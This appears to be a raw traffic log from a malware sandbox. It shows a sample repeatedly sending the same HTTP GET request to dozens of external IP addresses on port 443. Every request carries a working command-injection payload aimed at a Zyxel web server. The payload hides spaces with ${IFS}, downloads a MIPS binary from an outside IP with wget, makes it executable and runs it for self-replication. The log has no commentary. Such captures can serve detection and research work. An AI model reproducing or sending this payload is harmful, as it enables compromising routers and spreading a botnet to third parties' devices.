                                            Jan 14, 2024 15:50:50.643116951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7274192.168.2.2351632182.56.76.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643146992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7275192.168.2.23395029.144.191.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643188000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7276192.168.2.2337996174.48.85.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643227100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7277192.168.2.23345068.6.143.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643234968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7278192.168.2.2351458180.60.145.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643265009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7279192.168.2.2341796193.106.195.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643316031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7280192.168.2.2356846157.145.11.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643342972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7281192.168.2.2352720112.55.157.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643353939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7282192.168.2.2336258163.127.222.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643410921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7283192.168.2.2358984120.115.190.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643438101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7284192.168.2.2352652129.113.126.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643471003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7285192.168.2.234700295.12.208.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643507004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7286192.168.2.2341236130.188.160.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643580914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7287192.168.2.2347304187.134.95.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643614054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7288192.168.2.2340724220.19.147.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643640995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7289192.168.2.235841057.28.216.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643666983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7290192.168.2.23340105.30.180.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643718004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7291192.168.2.235782473.233.201.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643729925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7292192.168.2.2334838191.28.60.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643759012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7293192.168.2.2349594217.181.129.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643842936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7294192.168.2.235277452.199.59.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643861055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7295192.168.2.234317257.62.61.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643887997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7296192.168.2.2358358204.87.0.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643913031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7297192.168.2.23351164.59.186.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643932104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7298192.168.2.235319049.202.55.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.643971920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7299192.168.2.234528866.129.87.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644004107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7300192.168.2.2344752138.244.150.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644028902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7301192.168.2.23546308.202.22.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644054890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7302192.168.2.2339674196.243.241.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644085884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7303192.168.2.235677467.110.72.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644126892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7304192.168.2.2344204126.143.21.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644162893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7305192.168.2.2343102167.69.42.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644164085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7306192.168.2.2333550216.107.44.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644192934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7307192.168.2.236047886.161.19.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644264936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7308192.168.2.2358642133.227.117.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644293070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7309192.168.2.233336866.155.145.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644320011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7310192.168.2.2343694141.161.186.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644340992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7311192.168.2.2340996128.226.40.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644356012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7312192.168.2.2336498219.99.63.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644412994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7313192.168.2.2353024218.211.210.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644431114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7314192.168.2.234301461.109.9.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644470930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7315192.168.2.2342682175.178.169.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644500017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7316192.168.2.2343448174.141.179.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644543886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7317192.168.2.2358100211.69.2.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644555092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7318192.168.2.2341976151.241.25.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644577980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7319192.168.2.233606886.52.68.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644629002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7320192.168.2.2359018112.115.249.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644642115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7321192.168.2.2343608149.236.92.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644673109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7322192.168.2.233339051.234.121.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644732952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7323192.168.2.2342410100.240.73.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644754887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7324192.168.2.2349450161.43.32.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644756079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7325192.168.2.2351556152.58.190.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644802094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7326192.168.2.2345130216.115.191.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644848108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7327192.168.2.2349374169.4.50.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644870996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7328192.168.2.2334560177.211.160.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644890070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7329192.168.2.2355214200.110.159.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644948006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7330192.168.2.2359218169.98.65.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.644984007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7331192.168.2.2346736144.190.51.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645003080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7332192.168.2.2333870156.16.43.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645035982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7333192.168.2.2349848197.2.104.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645071030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7334192.168.2.23523602.21.33.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645109892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7335192.168.2.235446053.212.87.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645157099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7336192.168.2.2353054145.1.108.7443
                                            TimestampBytes transferredDirectionData
